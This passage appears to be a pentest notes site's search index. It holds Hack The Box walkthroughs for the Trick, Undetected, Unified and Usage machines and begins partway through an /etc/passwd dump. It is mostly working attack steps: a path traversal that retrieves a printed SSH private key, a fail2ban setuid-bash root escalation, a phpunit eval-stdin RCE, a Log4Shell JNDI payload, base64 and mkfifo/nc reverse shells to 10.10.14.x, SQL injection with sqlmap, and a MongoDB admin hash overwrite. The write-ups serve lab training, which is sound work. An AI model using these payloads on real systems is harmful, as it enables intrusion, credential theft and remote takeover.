daemon,,,:/var/lib/usbmux:/usr/sbin/nologin\nrtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin\npulse:x:109:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin\nspeech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false\navahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin\nsaned:x:112:121::/var/lib/saned:/usr/sbin/nologin\ncolord:x:113:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin\ngeoclue:x:114:123::/var/lib/geoclue:/usr/sbin/nologin\nhplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false\nDebian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false\nsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin\nmysql:x:117:125:MySQL Server,,,:/nonexistent:/bin/false\nsshd:x:118:65534::/run/sshd:/usr/sbin/nologin\npostfix:x:119:126::/var/spool/postfix:/usr/sbin/nologin\nbind:x:120:128::/var/cache/bind:/usr/sbin/nologin\nmichael:x:1001:1001::/home/michael:/bin/bash\n

Now we can guess that /home/michael contains a .ssh folder with an id_rsa private key. To retrieve it, we can use Burp and capture this request:

                        http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././home/michael/.ssh/id_rsa\n
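Alternatively, the same request can be issued with curl and the output saved directly to a file (a sketch reusing the traversal path from above):

curl -s \"http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././home/michael/.ssh/id_rsa\" -o key\n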

As a result, we can download michael's private key and use it to log in via SSH:

                        HTTP/1.1 200 OK\nServer: nginx/1.14.2\nDate: Thu, 20 Oct 2022 08:25:41 GMT\nContent-Type: text/html; charset=UTF-8\nConnection: close\nContent-Length: 1823\n\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAwI9YLFRKT6JFTSqPt2/+7mgg5HpSwzHZwu95Nqh1Gu4+9P+ohLtz\nc4jtky6wYGzlxKHg/Q5ehozs9TgNWPVKh+j92WdCNPvdzaQqYKxw4Fwd3K7F4JsnZaJk2G\nYQ2re/gTrNElMAqURSCVydx/UvGCNT9dwQ4zna4sxIZF4HpwRt1T74wioqIX3EAYCCZcf+\n4gAYBhUQTYeJlYpDVfbbRH2yD73x7NcICp5iIYrdS455nARJtPHYkO9eobmyamyNDgAia/\nUkn75SroKGUMdiJHnd+m1jW5mGotQRxkATWMY5qFOiKglnws/jgdxpDV9K3iDTPWXFwtK4\n1kC+t4a8sQAAA8hzFJk2cxSZNgAAAAdzc2gtcnNhAAABAQDAj1gsVEpPokVNKo+3b/7uaC\nDkelLDMdnC73k2qHUa7j70/6iEu3NziO2TLrBgbOXEoeD9Dl6GjOz1OA1Y9UqH6P3ZZ0I0\n+93NpCpgrHDgXB3crsXgmydlomTYZhDat7+BOs0SUwCpRFIJXJ3H9S8YI1P13BDjOdrizE\nhkXgenBG3VPvjCKiohfcQBgIJlx/7iABgGFRBNh4mVikNV9ttEfbIPvfHs1wgKnmIhit1L\njnmcBEm08diQ716hubJqbI0OACJr9SSfvlKugoZQx2Iked36bWNbmYai1BHGQBNYxjmoU6\nIqCWfCz+OB3GkNX0reINM9ZcXC0rjWQL63hryxAAAAAwEAAQAAAQASAVVNT9Ri/dldDc3C\naUZ9JF9u/cEfX1ntUFcVNUs96WkZn44yWxTAiN0uFf+IBKa3bCuNffp4ulSt2T/mQYlmi/\nKwkWcvbR2gTOlpgLZNRE/GgtEd32QfrL+hPGn3CZdujgD+5aP6L9k75t0aBWMR7ru7EYjC\ntnYxHsjmGaS9iRLpo79lwmIDHpu2fSdVpphAmsaYtVFPSwf01VlEZvIEWAEY6qv7r455Ge\nU+38O714987fRe4+jcfSpCTFB0fQkNArHCKiHRjYFCWVCBWuYkVlGYXLVlUcYVezS+ouM0\nfHbE5GMyJf6+/8P06MbAdZ1+5nWRmdtLOFKF1rpHh43BAAAAgQDJ6xWCdmx5DGsHmkhG1V\nPH+7+Oono2E7cgBv7GIqpdxRsozETjqzDlMYGnhk9oCG8v8oiXUVlM0e4jUOmnqaCvdDTS\n3AZ4FVonhCl5DFVPEz4UdlKgHS0LZoJuz4yq2YEt5DcSixuS+Nr3aFUTl3SxOxD7T4tKXA\nfvjlQQh81veQAAAIEA6UE9xt6D4YXwFmjKo+5KQpasJquMVrLcxKyAlNpLNxYN8LzGS0sT\nAuNHUSgX/tcNxg1yYHeHTu868/LUTe8l3Sb268YaOnxEbmkPQbBscDerqEAPOvwHD9rrgn\nIn16n3kMFSFaU2bCkzaLGQ+hoD5QJXeVMt6a/5ztUWQZCJXkcAAACBANNWO6MfEDxYr9DP\nJkCbANS5fRVNVi0Lx+BSFyEKs2ThJqvlhnxBs43QxBX0j4BkqFUfuJ/YzySvfVNPtSb0XN\njsj51hLkyTIOBEVxNjDcPWOj5470u21X8qx2F3M4+YGGH+mka7P+VVfvJDZa67XNHzrxi+\nIJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==\n-----END OPENSSH PRIVATE KEY-----\n

Now we save it under any name and restrict its permissions:

nano key\n# CTRL-SHIFT-V to paste it\n# CTRL-X, Y and ENTER to save the buffer and exit\nchmod 400 key\n

                        And we can login as michael:

                        ssh -i key michael@10.10.11.166\n

                        In /home/michael we have the user flag: user.txt.

                        ","tags":["walkthrough"]},{"location":"htb-trick/#escalation-of-privileges","title":"Escalation of privileges","text":"

                        Getting the system flag. Check michael's groups:

                        id\n

                        Results:

                        uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)\n

                        Check michael's permissions:

                        sudo -l\n

                        Results:

                        Matching Defaults entries for michael on trick:\n    env_reset, mail_badpass,\n    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\n\nUser michael may run the following commands on trick:\n    (root) NOPASSWD: /etc/init.d/fail2ban restart\n

The interesting part here is that michael may restart the fail2ban service as root without any password. Combined with a misconfiguration, we can exploit this.

For starters, michael has write permissions on the configuration files located in /etc/fail2ban/action.d.

                        Run:

                        ls -la /etc/fail2ban\n

And we can see that michael, as a member of the security group, has rwx rights on this root-owned directory:

                        ...\ndrwxrwx---   2 root security  4096 Oct 20 11:03 action.d\n...\n

Now we need to understand what fail2ban is and how it works. fail2ban is a popular IDPS tool: not only can it detect attacks, it can also block malicious IP addresses using Linux iptables. Although fail2ban can protect services like HTTP, SMTP, IMAP, etc., most sysadmins use it to protect the SSH service. The fail2ban daemon reads the log files, and if a malicious pattern is detected (e.g. multiple failed login requests), it executes a command to block the offending IP for a certain period of time, or even forever.

                        In the file /etc/fail2ban/jail.conf, we can spot some customizations such as ban time and maxretry:

                        cat /etc/fail2ban/jail.conf\n

And we see that bantime is limited to 10 seconds and the maximum number of retries to 5:

                        # \"bantime\" is the number of seconds that a host is banned.\nbantime  = 10s\n\n# A host is banned if it has generated \"maxretry\" during the last \"findtime\"\n# seconds.\nfindtime  = 10s\n\n# \"maxretry\" is the number of failures before a host gets banned.\nmaxretry = 5\n

This means that if we fail the SSH login six times (exceeding the maxretry parameter), the ban action defined in /etc/fail2ban/action.d/iptables-multiport.conf will be executed as root and, as a consequence, our host will be banned. As a member of the security group, michael does have rwx permissions on the parent folder /etc/fail2ban/action.d, but not on the file /etc/fail2ban/action.d/iptables-multiport.conf itself:

                        ls -la /etc/fail2ban/action.d/iptables-multiport.conf\n

                        Result:

                        -rw-r--r-- 1 root root 1420 Oct 20 12:48 iptables-multiport.conf\n

We therefore need a way to edit that file and include our malicious code. As the fail2ban service is restarted every minute or so, you need to execute the following commands quickly. They let you replace the file /etc/fail2ban/action.d/iptables-multiport.conf:

# move the root-owned file aside (possible because we have write permission on the directory)\nmv /etc/fail2ban/action.d/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf.bak\n# copy it back: the new file is owned by us, so we can edit it\ncp /etc/fail2ban/action.d/iptables-multiport.conf.bak /etc/fail2ban/action.d/iptables-multiport.conf\n# edit the file and add your lines\nnano /etc/fail2ban/action.d/iptables-multiport.conf\n# In the file, comment out the line with the actionban definition and\n# add:\n# actionban = chmod +s /bin/bash\n# Also comment out the line with the actionunban definition and\n# add:\n# actionunban = chmod +s /bin/bash\n# CTRL-X, Y and ENTER to save changes.\n

                        With \"chmod +s /bin/bash\" we're going to give the suid bit to bash. The suid bit provides the user running it the same privileges that the user who created it. In this case, root is the user who created it. If we run it, we'll have root privileges during its execution. The next step is restarting the service to get the file iptables-multiport.conf updated.

                        sudo /etc/init.d/fail2ban restart\n

Now, when we fail to log into the system via SSH more than 5 times, the actionban command set in iptables-multiport.conf will be executed as root. For that, from the attacker command line:

1. Install sshpass, a program that lets us pass passwords to ssh on the command line, so we can automate the login attempts:
                        sudo apt install sshpass\n
2. Write a script on the attacker machine:
                        nano wronglogin.sh\n
                        #!/bin/bash\n\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\nsshpass -p \"wrongpassword\" ssh michael@10.10.11.166\n

                        Add execution permission:

chmod +x wronglogin.sh\n
3. Launch the script:
                        ./wronglogin.sh\n
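Alternatively, the same six failed logins can be produced with a one-off loop (a sketch; the -o StrictHostKeyChecking=no option just suppresses the interactive host-key prompt on first connection):

for i in $(seq 1 6); do sshpass -p \"wrongpassword\" ssh -o StrictHostKeyChecking=no michael@10.10.11.166; done\n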

Once the script has run, the setuid bit will be set on bash. Run:

                         ls -l /bin/bash\n

                        And you will see:

                        -rwsr-sr-x 1 root root 1168776 Oct 20  2022 /bin/bash\n

                        Now if we run:

                        bash -p\n

The -p flag turns on privileged mode. In this mode, the $BASH_ENV and $ENV files are not processed, shell functions are not inherited from the environment, and the SHELLOPTS, BASHOPTS, CDPATH and GLOBIGNORE variables, if they appear in the environment, are ignored. Crucially, -p also stops bash from resetting the effective UID to the real UID, so the setuid root privilege is preserved. The result:

                        michael@trick:~$ bash -p\nbash-5.0# id\nuid=1001(michael) gid=1001(michael) euid=0(root) egid=0(root) groups=0(root),1001(michael),1002(security)\nbash-5.0# cd /root\nbash-5.0# ls\nf2b.sh  fail2ban  root.txt  set_dns.sh\n

                        To display the system flag:

                        cat root.txt\n
                        ","tags":["walkthrough"]},{"location":"htb-undetected/","title":"HTB undetected","text":"
                        nmap -sV -sC -Pn $ip --top-ports 4250\n

                        Open ports: 22 and 80.

                        Entering the IP in a browser we get to a website.

Reviewing the source code, we see that the \"Store\" menu item links to http://store.djewelry.htb/.

                        Another way to find out:

                        # with gobuster\ngobuster dns -d djewelry.htb -w /usr/share/seclists/Discovery/DNS/namelist.txt \n

Open /etc/hosts and add the IP together with store.djewelry.htb and djewelry.htb.

After browsing around both websites, we find nothing noticeable, so we fuzz both subdomains:

                        # With wfuzz\nwfuzz -c --hc 404 -t 200 -u http://store.djewelry.htb/FUZZ -w /usr/share/dirb/wordlists/common.txt  \n\nwfuzz -c --hc 404 -t 200 -u http://djewelry.htb/FUZZ -w /usr/share/dirb/wordlists/common.txt  \n

Nothing interesting under the main domain, but under http://store.djewelry.htb:

                        ********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer                         *\n********************************************************\n\nTarget: http://store.djewelry.htb/FUZZ\nTotal requests: 4614\n\n=====================================================================\nID           Response   Lines    Word       Chars       Payload                    \n=====================================================================\n\n000000001:   200        195 L    475 W      6203 Ch     \"http://store.djewelry.htb/\n                                                        \"                          \n000000013:   403        9 L      28 W       283 Ch      \".htpasswd\"                \n000000012:   403        9 L      28 W       283 Ch      \".htaccess\"                \n000000011:   403        9 L      28 W       283 Ch      \".hta\"                     \n000001114:   301        9 L      28 W       322 Ch      \"css\"                      \n000001648:   301        9 L      28 W       324 Ch      \"fonts\"                    \n000002021:   200        195 L    475 W      6203 Ch     \"index.php\"                \n000001991:   301        9 L      28 W       325 Ch      \"images\"                   \n000002179:   301        9 L      28 W       321 Ch      \"js\"                       \n000003588:   403        9 L      28 W       283 Ch      \"server-status\"            \n000004286:   301        9 L      28 W       325 Ch      \"vendor\"                   \n\nTotal time: 0\nProcessed Requests: 4614\nFiltered Requests: 4603\nRequests/sec.: 0\n

/vendor has directory listing enabled, so we can browse all files and folders under /vendor.

After browsing for a while, we find a package with a vulnerable version installed (all installed packages and their versions are listed at http://store.djewelry.htb/vendor/composer/installed.json). The vulnerable package is \"phpunit/phpunit\" version \"5.6.2\".

                        Some exploits:

                        https://blog.ovhcloud.com/cve-2017-9841-what-is-it-and-how-do-we-protect-our-customers/

                        In my case:

                        curl -XGET --data \"<?php system('whoami');?>\" http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\n
                        www-data\n

                        Now, we can get a reverse shell:

The reverse shell command before base64-encoding it: \"bash -i >& /dev/tcp/10.10.14.2/4444 0>&1\"

                        curl -XGET --data \"<?php system('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yLzQ0NDQgMD4mMQo=|base64 -d|bash'); ?>\" http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\n

                        See a walkthrough: https://0xdf.gitlab.io/2022/07/02/htb-undetected.html

                        "},{"location":"htb-unified/","title":"Walkthrough - Unified - A HackTheBox machine","text":"

                        Enumerate open services:

                        nmap -sC -sV $ip -Pn\n

                        Results:

                        PORT     STATE SERVICE         VERSION\n22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC82vTuN1hMqiqUfN+Lwih4g8rSJjaMjDQdhfdT8vEQ67urtQIyPszlNtkCDn6MNcBfibD/7Zz4r8lr1iNe/Afk6LJqTt3OWewzS2a1TpCrEbvoileYAl/Feya5PfbZ8mv77+MWEA+kT0pAw1xW9bpkhYCGkJQm9OYdcsEEg1i+kQ/ng3+GaFrGJjxqYaW1LXyXN1f7j9xG2f27rKEZoRO/9HOH9Y+5ru184QQXjW/ir+lEJ7xTwQA5U1GOW1m/AgpHIfI5j9aDfT/r4QMe+au+2yPotnOGBBJBz3ef+fQzj/Cq7OGRR96ZBfJ3i00B/Waw/RI19qd7+ybNXF/gBzptEYXujySQZSu92Dwi23itxJBolE6hpQ2uYVA8VBlF0KXESt3ZJVWSAsU3oguNCXtY7krjqPe6BZRy+lrbeska1bIGPZrqLEgptpKhz14UaOcH9/vpMYFdSKr24aMXvZBDK1GJg50yihZx8I9I367z0my8E89+TnjGFY2QTzxmbmU=\n|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBH2y17GUe6keBxOcBGNkWsliFwTRwUtQB3NXEhTAFLziGDfCgBV7B9Hp6GQMPGQXqMk7nnveA8vUz0D7ug5n04A=\n|   256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKfXa+OM5/utlol5mJajysEsV4zb/L0BJ1lKxMPadPvR\n6789/tcp open  ibm-db2-admin?\n8080/tcp open  http-proxy\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Did not follow redirect to https://10.129.96.149:8443/manage\n| fingerprint-strings: \n|   FourOhFourRequest: \n|     HTTP/1.1 404 \n|     Content-Type: text/html;charset=utf-8\n|     Content-Language: en\n|     Content-Length: 431\n|     Date: Mon, 08 May 2023 10:46:41 GMT\n|     Connection: close\n|     <!doctype html><html lang=\"en\"><head><title>HTTP Status 404 \n|     Found</title><style type=\"text/css\">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 \n|     Found</h1></body></html>\n|   GetRequest, HTTPOptions: \n|     HTTP/1.1 302 \n|     Location: http://localhost:8080/manage\n|     Content-Length: 0\n|     Date: Mon, 08 May 2023 10:46:41 GMT\n|     Connection: close\n|   RTSPRequest, Socks5: \n|     HTTP/1.1 400 \n|     Content-Type: text/html;charset=utf-8\n|     Content-Language: en\n|     Content-Length: 435\n|     Date: Mon, 08 May 2023 10:46:41 GMT\n|     Connection: close\n|     <!doctype html><html lang=\"en\"><head><title>HTTP Status 400 \n|     Request</title><style type=\"text/css\">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 \n|_    Request</h1></body></html>\n|_http-open-proxy: Proxy might be redirecting requests\n8443/tcp open  ssl/nagios-nsca Nagios NSCA\n| http-title: UniFi Network\n|_Requested resource was /manage/account/login?redirect=%2Fmanage\n| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/organizationalUnitName=UniFi/localityName=New York\n| Subject Alternative Name: DNS:UniFi\n| Issuer: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/organizationalUnitName=UniFi/localityName=New York\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 
2021-12-30T21:37:24\n| Not valid after:  2024-04-03T21:37:24\n| MD5:   e6be8c035e126827d1fe612ddc76a919\n| SHA-1: 111baa119cca44017cec6e03dc455cfe65f6d829\n| -----BEGIN CERTIFICATE-----\n| MIIDfTCCAmWgAwIBAgIEYc4mlDANBgkqhkiG9w0BAQsFADBrMQswCQYDVQQGEwJV\n

                        After visiting https://10.129.96.149:8080/, we are redirected to https://10.129.96.149:8443/manage/account/login

It's the login panel of a UniFi application, and the version is disclosed: 6.4.54. A quick Google search for \"exploit unifi 6.4.54\" shows that it is affected by a Log4j vulnerability (Log4Shell, CVE-2021-44228).

                        For exploiting it:

sudo apt install openjdk-11-jre maven\n\n\n\ngit clone https://github.com/veracode-research/rogue-jndi \n\ncd rogue-jndi\n\nmvn package\n\n# Once it's built, base64-encode a reverse shell with your attacker IP and listening port\necho 'bash -c bash -i >&/dev/tcp/10.10.14.2/4444 0>&1' | base64\n# This will return: YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMi80NDQ0IDA+JjEK\n\n# Get out of the rogue-jndi folder and\njava -jar rogue-jndi/target/RogueJndi-1.1.jar --command \"bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMi80NDQ0IDA+JjEK}|{base64,-d}|{bash,-i}\" --hostname \"10.129.96.149\"\n# In the bash command, paste your own base64 reverse shell\n# --hostname: victim IP\n

Now, open a terminal and launch netcat listening on the port you defined in your payload.
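For instance, matching the port used when generating the payload above:

nc -lnvp 4444\n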

                        With Burpsuite, get a request for login:

                        POST /api/login HTTP/1.1\nHost: 10.129.96.149:8443\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.129.96.149:8443/manage/account/login\nContent-Type: application/json; charset=utf-8\nOrigin: https://10.129.96.149:8443\nContent-Length: 104\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"username\":\"lala\",\"password\":\"lele\",\"remember\":false,\"strict\":true}\n

As the exploit write-up for this UniFi version explains, the injectable parameter is \"remember\". So we insert our payload there and send the request with Repeater:

                        POST /api/login HTTP/1.1\nHost: 10.129.96.149:8443\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.129.96.149:8443/manage/account/login\nContent-Type: application/json; charset=utf-8\nOrigin: https://10.129.96.149:8443\nContent-Length: 104\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"username\":\"lala\",\"password\":\"lele\",\"remember\":\"${jndi:ldap://10.10.14.2:1389/o=tomcat}\",\"strict\":true}\n

Once we send that request, our rogue JNDI server will deliver the payload that triggers the reverse shell.

And in our terminal with the nc listener we will get the reverse shell. Upgrade it to a fully interactive TTY with:

                        SHELL=/bin/bash script -q /dev/null\nCtrl-Z\nstty raw -echo\nfg\nreset\nxterm\n

                        user.txt is under /home/michael/

                        ","tags":["walkthrough","log4j","jndi","mongodb"]},{"location":"htb-unified/#privilege-escalation","title":"Privilege escalation","text":"

                        Do some basic reconnaissance:

                        whoami\nid\ngroups\nsudo -l\nuname -a\n

We can also check /etc/passwd to see other existing service accounts and users.

cat /etc/passwd\n

Results:

root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nunifi:x:999:999::/home/unifi:/bin/sh\nmongodb:x:101:102::/var/lib/mongodb:/usr/sbin/nologin\n

After the unifi user, there is a mongodb service account. We also know that with UniFi version 6.4.54 we can get access to the administrator panel of the UniFi application and possibly extract the SSH secrets used between the appliances.

[See mongodb cheat sheet](27017-27018-mongodb.md).

First, find out on which port the service is running:

ps aux | grep mongo\n

Results:

unifi 67 0.4 4.2 1103744 85568 ? Sl 11:44 0:46 bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1\nunifi 5183 0.0 0.0 11468 1108 pts/0 S+ 14:47 0:00 grep mongo\n

The service listens on port 27117. Let's interact with the MongoDB service using the mongo command-line utility and attempt to extract the administrator password. A quick Google search using the keywords UniFi Default Database shows that the default database name for the UniFi application is ace.

From the terminal of the victim's machine:

mongo --port 27117 ace --eval \"db.admin.find().forEach(printjson);\"\n# mongo: use the mongo interactive command line\n# --port: indicate the port\n# ace: default database name in UniFi\n# --eval: evaluate the given expression\n

                        And now we have...

MongoDB shell version v3.6.3\nconnecting to: mongodb://127.0.0.1:27117/ace\nMongoDB server version: 3.6.3\n{\n        \"_id\" : ObjectId(\"61ce278f46e0fb0012d47ee4\"),\n        \"name\" : \"administrator\",\n        \"email\" : \"administrator@unified.htb\",\n        \"x_shadow\" : \"$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.\",\n        \"time_created\" : NumberLong(1640900495),\n        \"last_site_name\" : \"default\",\n        \"ui_settings\" : \n

The output reveals a user called administrator. Their password hash is located in the x_shadow variable, but in this instance it cannot be cracked with any password-cracking utilities. Instead, we can replace the x_shadow hash with one we create ourselves in order to overwrite the administrator's password and authenticate to the administrative panel. To do this we can use the mkpasswd command-line utility. The $6$ prefix identifies the hashing algorithm in use, SHA-512 in this case, so we have to generate a hash of the same type.

mkpasswd -m sha-512 lalala\n

                        It returns: $6$bTJCdmWvffwcSm9p$6FHYn1fesp3WjZesRG20dDQ/bp6Vktrq8aLylXvil8tApzFCguM2MEii63Uemf8BE7jBrB5ZcZwes85JpuXPq0

                        With that, now we can update the administrator password. From the terminal of the victim's machine:

                        mongo --port 27117 ace --eval 'db.admin.update({\"_id\":\nObjectId(\"61ce278f46e0fb0012d47ee4\")},{$set:{\"x_shadow\":\"$6$bTJCdmWvffwcSm9p$6FHYn1fesp3WjZesRG20dDQ/bp6Vktrq8aLylXvil8tApzFCguM2MEii63Uemf8BE7jBrB5ZcZwes85JpuXPq0\"}})'\n# ObjectId is the one that correlates with the administrator one.\n
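Optionally, we can confirm the update took effect by re-running the earlier query and checking the x_shadow field:

mongo --port 27117 ace --eval \"db.admin.find().forEach(printjson);\"\n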

                        Now, in the admin panel from the browser enter the new credentials for administrator.

                        When logged into the dashboard, grab ssh credentials for root user from Settings>Site, tab \"Device Authentication\", SSH Authentication.

With those credentials, access the machine via SSH.

                        ","tags":["walkthrough","log4j","jndi","mongodb"]},{"location":"htb-usage/","title":"Walkthrough - Usage, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-usage/#about-the-machine","title":"About the machine","text":"data Machine Usage Platform Hackthebox url link OS Linux Difficulty Easy Points 20 ip 10.10.11.18","tags":["walkthrough"]},{"location":"htb-usage/#getting-usertxt-flag","title":"Getting user.txt flag","text":"","tags":["walkthrough"]},{"location":"htb-usage/#enumeration","title":"Enumeration","text":"
                        sudo nmap -sV -sC $ip -p-\n

Results: ports 22 and 80 are open.

                        ","tags":["walkthrough"]},{"location":"htb-usage/#browsing-the-app","title":"Browsing the app","text":"

After browsing to http://10.10.11.18, a DNS error is displayed because the page redirects to http://usage.htb.

                        I will add that line in my host resolver config file.

# add the hostname to our resolver file\necho \"10.10.11.18    usage.htb\" | sudo tee -a /etc/hosts\n

The application is simple: a login panel with a \"Remember your password\" link, plus links to an admin login panel and a logout feature. Enumeration also suggests that the Laravel framework is in use.

After testing the login form and the password-reminder form, I detect a SQL injection vulnerability in the latter.

                        Previously I registered a user lala@lala.com.

                        Payloads for manual detection:

                        lala@lala.com' AND 1=1;-- -\n

lala@lala.com' AND 1=2;-- -\n

Now we know that we have a blind SQL injection exploitable with the boolean-based AND technique, so we can use sqlmap with the --technique flag set to BUT (Boolean-based blind, Union query-based, Time-based blind). We can also save time by using the --dbms flag to indicate that it is a MySQL database:

                        sqlmap -r request.txt  -p 'email' --dbms=mysql --level=3 --risk=3 --technique=BUT -v 7 --batch --dbs --dump --threads 3\n\nsqlmap -r request.txt  -p 'email' --dbms=mysql --level=3 --risk=3 --technique=BUT -v 7 --batch -D usage_blog --tables --dump --threads 3\n\nsqlmap -r request.txt  -p 'email' --dbms=mysql --level=3 --risk=3 --technique=BUT -v 7 --batch -D usage_blog -T admin_users --dump --threads 3\n
                        ","tags":["walkthrough"]},{"location":"htb-usage/#upload-a-reverse-shell","title":"Upload a reverse shell","text":"

                        The admin profile can be edited. The upload feature for the avatar image is vulnerable.

First, I tried to upload a PHP file, but file extensions are sanitized client-side.

Then I uploaded a PHP reverse shell file using a jpg extension. The file was uploaded but not executed as PHP.

Finally, I used Burpsuite to intercept the upload of my ivan.jpg file and modified the extension to php in transit.

The reverse shell worked, but only for a limited period of time: long enough to set up a hook and establish a new, more stable connection with a bash reverse shell.

                        rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.49 4444 >/tmp/f\n
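On the attacker machine, a matching listener must be running first (port taken from the one-liner above):

nc -lnvp 4444\n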

                        ","tags":["walkthrough"]},{"location":"htb-usage/#getting-usertxt","title":"Getting user.txt","text":"

                        First, I spawned a shell:

                        SHELL=/bin/bash script -q /dev/null\n

                        and printed out the flag:

                        cat /home/dash/user.txt\n
                        ","tags":["walkthrough"]},{"location":"htb-usage/#getting-roottxt","title":"Getting root.txt","text":"

First, I perform lateral movement to the other user present on the machine. For that, I cat the /etc/passwd file and run the linpeas.sh script on the machine.

                        ","tags":["walkthrough"]},{"location":"htb-usage/#lateral-movement","title":"Lateral movement","text":"

                        Enumerate other users with access to a bash terminal:

cat /etc/passwd | grep -E '/bin/bash$'\n

                        Results:

                        root:x:0:0:root:/root:/bin/bash\ndash:x:1000:1000:dash:/home/dash:/bin/bash\nxander:x:1001:1001::/home/xander:/bin/bash\n

Upload the linpeas script to the victim's machine.

